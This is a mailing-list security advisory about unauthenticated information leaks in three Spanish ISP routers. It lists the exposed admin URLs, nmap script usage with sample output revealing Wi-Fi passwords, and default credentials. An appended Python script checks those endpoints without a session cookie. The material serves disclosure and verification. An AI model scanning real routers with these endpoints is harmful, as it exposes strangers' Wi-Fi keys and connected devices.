Message-ID: <CAGSo8sdpZFWjqCkVcvzyROEjnRCX52sabjDHOROWVd-GDRAkGw@mail.gmail.com>
Date: Fri, 20 Nov 2015 11:17:16 +0100
From: Daniel Díez <danihzt@...il.com>
To: fulldisclosure@...lists.org
Subject: [FD] Leak information on Huawei HG253s v2, Comtrend VG 8050 and ADB P.DGA4001N (HomeStation)

Huawei HG253s v2

Vodafone-Spain is starting to rent a new Huawei HG253v2 router to Spanish customers. This new router comes with a new firmware version.

This bug has been found by @VicenDominguez

Vulnerability

Basically, it is not validating the session cookie in some administration web pages, so it is possible to get information directly from those URLs on any router open to the Internet.

http://IP/html_253s/api/ntwk/WlanBasic
http://IP/html_253s/api/system/diagnose_internet
http://IP/html_253s/api/system/hostinfo?type=ethhost
http://IP/html_253s/api/system/hostinfo?type=guesthost
http://IP/html_253s/api/system/hostinfo?type=homehost
http://IP/html_253s/api/system/hostinfo?type=wifihost
http://IP/html_253s/api/system/wizardcfg

Usage

nmap --script=http-enum-vodafone-hua253s.nse -p80,443 -sS x.x.x.x

Nmap scan report for x.x.x.x (x.x.x.x)
Host is up (0.34s latency).
PORT   STATE SERVICE
80/tcp open  http
| http-enum-vodafone-hua253s:
|   SSID: vodafone070 (14:b9:XX:XX:XX:XX) Password: (AES) 123456
|   Device: android-246e67b281179679-Wireless MAC: 48:5A:3F:XX:XX:XX IP: 192.168.0.XX

Comtrend VG 8050

Telefonica-Spain is starting to rent a new Comtrend VG 8050 router to Spanish customers. This new router comes with a new firmware version.

This bug has been found by @DaniLabs

Vulnerability

Basically, it is not validating the session cookie in some administration web pages, so it is possible to get information directly from those URLs on any router open to the Internet.

http://IP/getWifiInfo.jx
http://IP/listDevices.jx
http://IP/infoApplications.jx

Usage

nmap --script=http-enum-telefonica-comtrend-vg-8050.nse -p80,443 -sS x.x.x.x

Nmap scan report for x.x.x.x (x.x.x.x)
Host is up (0.34s latency).
PORT   STATE SERVICE
80/tcp open  http
| http-enum-telefonica-comtrend-vg-8050:
|   SSID: MOVISTAR_XXX
|   Cipher Algorithm: WPA
|   Password WEP:
|   Password WPA: gTU3NkXE44RYjuM2RrxM
|   Password WPA2:
|   Device: 192.168.0.X MAC: 5c:97:X:X:X:X IP: 192.168.0.X

ADB P.DGA4001N (HomeStation)

Telefonica-Spain is starting to rent a new ADB P.DGA4001N router to Spanish customers. This new router comes with a new firmware version.

This bug has been found by @DaniLabs

Vulnerability

Basically, it is not validating the session cookie in some administration web pages, so it is possible to get information directly from those URLs on any router open to the Internet.

http://IP/getWifiInfo.jx
http://IP/listDevices.jx
http://IP/infoApplications.jx

Additionally, the default credentials are admin / 1234

Usage

nmap --script=http-enum-telefonica-homestation.nse -p80,443 -sS x.x.x.x

Nmap scan report for x.x.x.x (x.x.x.x)
Host is up (0.34s latency).
PORT   STATE SERVICE
80/tcp open  http
| http-enum-telefonica-homestation:
|   SSID: WLAN_HOME
|   Cipher Algorithm: WEP
|   Device: IphonePedro MAC: A8:8E:24:X:X:X IP: 192.168.1.X

Here the scripts

https://github.com/DaniLabs/scripts-nse

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
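The three advisories above describe the same defect: administration pages that hand back data when requested without a session cookie. The following is an added example, not code from the post or from the DaniLabs NSE scripts, showing how to verify that condition for the listed endpoints from Python. It requests each path with no Cookie header and classifies the answer: a redirect or 401/403 means the page is protected, a 200 with content that is not a login form means the page is exposed. The login-form heuristic, the status-code mapping, the host 192.0.2.1 and the SAMPLE_RESPONSES used for the offline dry run are all assumptions made for this example; only the paths are taken from the post.

```python
import urllib.request
from urllib.error import HTTPError, URLError
from urllib.parse import urlsplit

# Endpoints named in the advisory, grouped by device; paths copied from the post.
# Which of them a given firmware actually exposes is for the scan to establish.
ENDPOINTS = {
    "Huawei HG253s v2": [
        "/html_253s/api/ntwk/WlanBasic",
        "/html_253s/api/system/diagnose_internet",
        "/html_253s/api/system/hostinfo?type=ethhost",
        "/html_253s/api/system/hostinfo?type=guesthost",
        "/html_253s/api/system/hostinfo?type=homehost",
        "/html_253s/api/system/hostinfo?type=wifihost",
        "/html_253s/api/system/wizardcfg",
    ],
    "Comtrend VG 8050 / ADB P.DGA4001N": [
        "/getWifiInfo.jx",
        "/listDevices.jx",
        "/infoApplications.jx",
    ],
}


def default_fetch(url, timeout=5):
    """GET url deliberately without any Cookie header; return (status, body).

    Returns (None, "") when the host cannot be reached at all.
    """
    req = urllib.request.Request(url, headers={"User-Agent": "session-cookie-check"})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status, resp.read().decode("utf-8", "replace")
    except HTTPError as err:  # 4xx/5xx answers still carry a status and a body
        return err.code, err.read().decode("utf-8", "replace")
    except (URLError, OSError):
        return None, ""


def looks_like_login_page(body):
    """Heuristic (assumption): a 200 that is really the login form is not a leak."""
    low = body.lower()
    return "<form" in low and ("password" in low or "login" in low)


def classify(status, body):
    """Map one unauthenticated response to a verdict.

    'exposed' is the advisory's condition: the page answered with content
    although no session cookie was sent.
    """
    if status is None:
        return "unreachable"
    if status in (301, 302, 303, 307, 308, 401, 403):
        return "protected"  # bounced to login or refused outright
    if status == 200 and body.strip() and not looks_like_login_page(body):
        return "exposed"
    return "inconclusive"  # 404, empty 200, 5xx: neither a leak nor a check shown


def check_device(base_url, paths, fetch=default_fetch):
    """Return {path: verdict} for one endpoint list against base_url."""
    base = base_url.rstrip("/")
    return {path: classify(*fetch(base + path)) for path in paths}


def check_all(base_url, fetch=default_fetch):
    """Run every endpoint group; the device is whichever group answers."""
    return {device: check_device(base_url, paths, fetch)
            for device, paths in ENDPOINTS.items()}


# Constructed sample responses for an offline dry run (not captured from a device).
SAMPLE_RESPONSES = {
    "/html_253s/api/ntwk/WlanBasic": (200, '{"WifiSsid": "example-ssid"}'),
    "/getWifiInfo.jx": (302, ""),
    "/listDevices.jx": (200, '<html><form action="/login"><input type="password"></form></html>'),
}


def fake_fetch(url, timeout=5):
    """Offline stand-in for default_fetch, keyed on path plus query string."""
    parts = urlsplit(url)
    key = parts.path + ("?" + parts.query if parts.query else "")
    return SAMPLE_RESPONSES.get(key, (404, ""))


if __name__ == "__main__":
    import sys
    # A real base URL on the command line scans that device; with no argument
    # the constructed samples are used against the hypothetical host 192.0.2.1.
    if len(sys.argv) > 1:
        results = check_all(sys.argv[1])
    else:
        results = check_all("http://192.0.2.1", fetch=fake_fetch)
    for device, verdicts in results.items():
        for path, verdict in verdicts.items():
            print(f"{verdict:12} {device}: {path}")
```

Run it as `python3 check.py http://IP` against a device you are authorised to test; with no argument it runs on the embedded samples. The verdict is deliberately three-valued: a 404 or an empty 200 proves neither that the page leaks nor that a session check exists, so it is reported as inconclusive rather than folded into either side.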